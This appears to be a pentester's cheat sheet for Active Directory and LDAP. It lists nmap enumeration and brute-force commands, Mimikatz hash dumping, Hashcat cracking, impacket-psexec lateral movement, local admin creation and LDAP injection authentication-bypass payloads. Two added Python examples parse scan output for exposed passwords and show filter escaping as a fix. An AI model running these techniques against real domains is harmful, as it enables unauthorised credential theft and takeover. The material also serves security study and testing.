- Active Directory Domain Services Overview
- Domain Controller Roles
- Active Directory: LDAP Syntax Filter
- SAM-Account-Type attribute
- Derivative Local Admin
- Predefined service accounts: LocalSystem | LocalService | NetworkService
- Spray-Passwords
- Extracting Password Hashes from the NTDS.dit File
- Pentesting LDAP (HackTricks)
- Attack Methods for Gaining Domain Admin Rights in Active Directory
- Active Directory Kill Chain Attack & Defense
- Pentesting Active Directory (xmind schema)
- Active Directory Attacks (good examples, zerologon, printnightmare, etc.)
- Introduction to Active Directory (HTB)
Tools: Mimikatz, PowerView, ldapsearch, BloodHound. See Pass-the-Hash, Overpass the Hash/Pass the Key.
Nmap scripts
TCP 389 LDAP plain text
TCP 636 LDAP SSL connection
TCP 3268 LDAP connection to Global Catalog
TCP 3269 LDAP connection to Global Catalog over SSL
389,636,3268,3269
ls -la /usr/share/nmap/scripts/ldap*
ldap-brute.nse ldap-novell-getpass.nse ldap-rootdse.nse ldap-search.nse
nmap -Pn -sV -p 389,636,3268,3269 --script=ldap* -d $IP
# Anonymous bind, all ldap* scripts except ldap-brute
nmap -Pn -n -sV -p 389,636,3268,3269 --script "ldap* and not brute" $IP -oA nmap-ldap
Enumerate users
nmap -Pn -p 389,636,3268,3269 --script ldap-search --script-args 'ldap.qfilter=users' $IP -oN nmap-ldap-search-users
awk -F "sAMAccountName: " '$2{print $2}' nmap-ldap-search-users | sort
grep -i -E "sAMAccountName|dn:|pass" nmap-ldap-search-users
# Look for passwords!
nmap -Pn -p 389,636,3268,3269 --script ldap-search --script-args 'ldap.qfilter=users,ldap.attrib=sAMAccountName' $IP -oN nmap-ldap-search-users
nmap -Pn -p 389,636,3268,3269 --script ldap-search --script-args 'ldap.username="cn=Full Username,cn=Users,dc=example,dc=com",ldap.password=MyPassword,ldap.qfilter=users,ldap.attrib=sAMAccountName' $IP
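The awk/grep post-processing above can be done more robustly with a small parser. The following Python script is an added example and not part of the original notes: it reads the per-entry text that nmap's ldap-search script writes (the sample below is constructed in that shape, not real scan output), lists the sAMAccountName of every entry and flags attributes whose name or value mentions a password, which is what an auditor looks for when checking a directory for credentials left in description or info fields.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the shape of nmap ldap-search output (not a real scan).
SAMPLE = """\
PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search:
|   Context: DC=example,DC=com
|     dn: CN=Administrator,CN=Users,DC=example,DC=com
|         objectClass: user
|         sAMAccountName: Administrator
|         description: Built-in account for administering the computer/domain
|     dn: CN=svc-backup,CN=Users,DC=example,DC=com
|         objectClass: user
|         sAMAccountName: svc-backup
|         description: backup service, pass: Summer2024!
|     dn: CN=jdoe,CN=Users,DC=example,DC=com
|         objectClass: user
|         sAMAccountName: jdoe
|_        info: Temporary password set by helpdesk
"""

# A script output line: '|' or '|_' prefix, indentation, then 'attribute: value'.
ATTR_RE = re.compile(r"^\|[_ ]\s*([A-Za-z][\w-]*): (.*)$")

# Attribute names or values that deserve a second look.
PASS_RE = re.compile(r"pass|pwd|secret", re.IGNORECASE)


def parse_ldap_search(output: str) -> List[Dict[str, str]]:
    """Group 'attr: value' lines under the 'dn:' line that precedes them."""
    entries: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in output.splitlines():
        m = ATTR_RE.match(line)
        if not m:
            continue
        attr, value = m.group(1), m.group(2).strip()
        if attr == "dn":
            current = {"dn": value}
            entries.append(current)
        elif current:
            current[attr] = value  # lines before the first dn (Context) are dropped
    return entries


def account_names(entries: List[Dict[str, str]]) -> List[str]:
    """Sorted sAMAccountName values, the equivalent of the awk | sort pipeline."""
    return sorted(e["sAMAccountName"] for e in entries if "sAMAccountName" in e)


def suspicious_attributes(entries: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(dn, attribute, value) triples whose name or value looks credential-related."""
    hits = []
    for e in entries:
        for attr, value in e.items():
            if attr != "dn" and (PASS_RE.search(attr) or PASS_RE.search(value)):
                hits.append((e["dn"], attr, value))
    return hits


if __name__ == "__main__":
    ents = parse_ldap_search(SAMPLE)
    print("Accounts:", ", ".join(account_names(ents)))
    for dn, attr, value in suspicious_attributes(ents):
        print(f"[!] {dn}: {attr} = {value}")
```

Run it against a real `-oN` file by replacing `SAMPLE` with the file contents; the regular expression only relies on the `|` / `|_` prefix and the `attribute: value` layout, so multi-valued attributes simply overwrite each other in the dictionary (extend it to lists if you need every value).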
Brute force passwords
Users must be Distinguished Names (DN), not bare sAMAccountName values! E.g. username@example.com
nmap -p 389,636,3268,3269 --script ldap-brute --script-args userdb=users-dn.txt,passdb=passwords.txt $IP
nmap -p 389,636,3268,3269 --script ldap-brute --script-args userdb=users-dn.txt $IP
USERS=/usr/share/seclists/Usernames/Names/names.txt
DOMAIN=example.com
nmap -p 389,636,3268,3269 --script ldap-brute --script-args userdb=${USERS},ldap.upnsuffix=${DOMAIN} $IP
Authentication
WDigest
Protocol used by older operating systems (Windows 7, Windows Server 2008 R2). See Microsoft documentation.
Credentials are stored in memory in clear text! Use Mimikatz.
NTLM Authentication
Protocol used when connecting to a server by IP address, when the hostname is NOT registered on the AD-integrated DNS server, or when a third-party application chooses NTLM authentication. See Microsoft Documentation.
Use Mimikatz to dump the SAM database and obtain NTLM hashes. Crack them using Hashcat (hash type: 1000).
Kerberos Authentication
Crack the Kerberos service ticket to obtain the clear-text password of the service account. The service ticket is encrypted with the password hash of the account the SPN is registered to.
See Kerberoasting.
Lateral Movement
There are 2 known lateral movement techniques for impersonating valid users or service accounts using hashes: Pass The Hash and Over Pass The Hash.
Hash cracking
When NTLM hashes are obtained using Mimikatz, crack them with Hashcat (hash type: 1000) or online cracking tools. See Password Attacks. Once passwords are found, try connecting to the machine.
Connect to the machine
impacket-psexec -dc-ip x.x.x.x example.com/username:password@y.y.y.y
- Try a password spray when there are numbers at the end of the password! Use the Nmap NSE script ldap-brute (see top of this page) or Hydra against SMB.
- Try Kerberoasting using the credentials found.
- If port 5985 is open, try Evil-WinRm.
- Do more enumeration! Use Impacket and authenticated ldapsearch.
Pass the Hash
See Pass-the-Hash. NTLM online hash generator.
Overpass the Hash/Pass the Key
Use the NTLM hash of another user account to obtain a Kerberos ticket (TGT) which can be used to access network resources. We can only use the TGT on the machine it was created for.
See Overpass the Hash/Pass the Key.
Pass the Ticket
TGS allows more flexibility than Overpass the Hash.
See Pass the Ticket.
Distributed Component Object Model (DCOM)
TO COMPLETE 🙁 Look at impacket-dcomexec.
Active Directory ACLs/ACEs Abuse
After running BloodHound, if you find privileges like “GenericAll”, “GenericWrite”, “Write”, “WriteProperty”, “Self”, “WriteOwner”, “ForceChangePassword”, “WriteDACL”, see Active Directory ACLs/ACEs Abuse.
Persistence
Golden Ticket
See Mimikatz.
Domain Controller Synchronization
TO COMPLETE 🙁
Privilege Escalation
Use a client-side attack to get first access to a computer as an AD user. You will then need to become a local administrator.
- Check logged-in users with PowerView. Their credentials are cached in memory; dumping them with Mimikatz requires local admin.
Ways to control the Domain
- Compromise a user in the Domain Admins group. This group gives complete control over all computers joined to that domain.
- Compromise a domain controller. It can be used to modify any joined computer or execute applications/services on it.
Domain controllers contain all the password hashes of all user accounts in that domain.
Active Directory (AD)
When Active Directory is configured, a domain such as <organisation name>.com is created. Objects are organized in Organizational Units (OUs), containers (like folders) that hold user and computer objects. Objects can have different properties.
Active Directory relies heavily on the Domain Name System (DNS). Typical domain controllers will also host an authoritative DNS server for the domain.
Command Examples
# Get domain name
net view /DOMAIN
# List domain users
net user /DOMAIN
# Current user details (e.g. user rights: if admin, Local Group Memberships: *Administrators)
net user "%username%" /DOMAIN
# List groups in AD
net group /DOMAIN
# List members of a group
net group group_name /DOMAIN
net group "Domain Admins" /DOMAIN
# Test credentials
runas /user:DOMAIN\username C:\Windows\System32\cmd.exe
Users & Groups & Active Directory (AD)
Local
# List local users
net user
# Current user details (e.g. user rights: if admin, Local Group Memberships: *Administrators)
net user "%username%"
# Create local user
net user myuser password /add
# Create local user and add user to local groups
net user /add myuser "password"
net localgroup "Administrators" myuser /add
net localgroup "Remote Desktop Users" myuser /add
# List local groups on the machine
net localgroup
# List members of a group
net localgroup Administrators
# Same group on a French-localized system
net localgroup Administrateurs
Change user password
Open a command prompt with "Run as administrator", even when logged in as an administrator: the command requires a high-integrity (UAC-elevated) process.
net user USERNAME mynewpassword
# Reset user password; * means the new password is prompted for
net user USERNAME *
Exploits
LDAP
LDAP provider path
An LDAP provider path is needed to perform LDAP queries against the domain controller, e.g.:
LDAP://DC01.example.com/DC=example,DC=com
LDAP Injection
LDAP injection testing is similar to SQL injection testing. The differences are that testers use the LDAP protocol instead of SQL and the target is an LDAP server instead of a SQL server. An LDAP injection attack breaks the following pattern:
Input -> LDAP query (user input concatenated into the filter unescaped) == LDAP injection
Enter admin)(&)) as the username to bypass authentication.
With Uname=admin)(&)) and any string as the Pwd value, the following query is constructed and sent to the server:
(&(USER=admin)(&))(PASSWORD=Pwd))
Servers that process only the first complete filter evaluate (&(USER=admin)(&)); (&) is always true, so the check succeeds regardless of the password.
From a CTF LDAP authentication challenge:
username=)(|(uid=&password=)
This produces the filter: (&(uid=)(|(uid=)(userPassword=)))
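Both injections above work because the application concatenates raw input into the filter template. The following Python module is an added example, not code from the original notes: it shows that template built the vulnerable way and the hardened way (every value escaped per RFC 4515 before insertion), plus a small structural check that splits a filter into its depth-0 groups. The attribute names and the two input pairs are taken from the notes above; the function names are my own. Note that the structural check only catches the first injection (the filter ends up with trailing garbage) and not the CTF one, whose result is a perfectly well-formed filter with altered meaning, which is why escaping, not validation of the finished string, is the actual fix.

```python
from typing import Dict, List, Tuple

# RFC 4515: characters that must be escaped inside an assertion value.
_ESCAPES: Dict[str, str] = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value so it can only ever be a literal."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def vulnerable_filter(user_attr: str, user: str, pwd_attr: str, pwd: str) -> str:
    """The broken pattern: raw input concatenated into the login filter."""
    return f"(&({user_attr}={user})({pwd_attr}={pwd}))"


def safe_filter(user_attr: str, user: str, pwd_attr: str, pwd: str) -> str:
    """Same template, but each value is escaped before it enters the filter."""
    return (
        f"(&({user_attr}={escape_filter_value(user)})"
        f"({pwd_attr}={escape_filter_value(pwd)}))"
    )


def top_level_filters(filter_str: str) -> Tuple[List[str], int]:
    """Split a filter string into its depth-0 parenthesised groups.

    Returns (groups, stray) where stray counts ')' seen at depth 0.
    A sane search filter is exactly one group and no stray characters.
    """
    groups: List[str] = []
    depth = stray = start = 0
    for i, ch in enumerate(filter_str):
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            if depth == 0:
                stray += 1
                continue
            depth -= 1
            if depth == 0:
                groups.append(filter_str[start : i + 1])
    return groups, stray


def is_well_formed(filter_str: str) -> bool:
    """True when the whole string is a single balanced filter group."""
    groups, stray = top_level_filters(filter_str)
    return stray == 0 and len(groups) == 1 and groups[0] == filter_str


if __name__ == "__main__":
    # Input pairs from the notes above (attribute names as given there).
    cases = [
        ("USER", "admin)(&))", "PASSWORD", "Pwd"),
        ("uid", ")(|(uid=", "userPassword", ")"),
    ]
    for ua, u, pa, p in cases:
        bad = vulnerable_filter(ua, u, pa, p)
        good = safe_filter(ua, u, pa, p)
        groups, stray = top_level_filters(bad)
        print(f"vulnerable: {bad}")
        print(f"  first group evaluated: {groups[0]}  stray ')': {stray}  "
              f"well-formed: {is_well_formed(bad)}")
        print(f"hardened:   {good}  well-formed: {is_well_formed(good)}")
```

In a real application you would not hand-roll `escape_filter_value`; the ldap3 library ships the same logic as `ldap3.utils.conv.escape_filter_chars`, and the rule is identical: escape every value before it touches a filter, and never build filters from unescaped strings in the first place.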